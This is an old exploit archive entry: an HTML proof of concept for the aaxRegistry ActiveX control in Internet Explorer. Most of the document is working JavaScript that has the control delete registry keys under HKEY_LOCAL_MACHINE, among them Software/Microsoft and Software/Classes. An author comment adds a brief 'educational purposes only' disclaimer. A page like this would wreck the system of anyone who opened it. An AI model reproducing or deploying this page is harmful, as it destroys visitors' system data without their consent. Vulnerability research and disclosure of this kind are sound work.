aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit

2008-05-09 00:00:00

<HTML>

<!--

- aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit -

Author: t0pP8uZz
Homepage: h4ck-y0u.org / milw0rm.com
Description: ActiveX Remote Insecure

Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 7 Fully Patched

ActiveX: http://www.aaxcomponents.com/aaxRegistry/aaxRegistryTRIALSetup.EXE

The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.

InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing one of its functions.

Peace.

-->

<OBJECT ID="aaareg" CLASSID="CLSID:5A000763-F048-46C9-8976-A62226ECB31E">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - aaxRegistry (aaxRegistry.ocx) Remote Registry Deletion Exploit - */
/* Javascript Code By t0pP8uZz */

aaareg.SetRootKey("HKEY_LOCAL_MACHINE"); /* Play with keys in HKLM ;) */

var x = [ /* Add new keys below.. Script will loop though and delete*/
'Software/Microsoft',
'Software/MDC',
'Software/Classes'
];

for(var c=0; c<x.length; c++)
aaareg.DeleteKey(x[c]);

</script>
</HTML>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.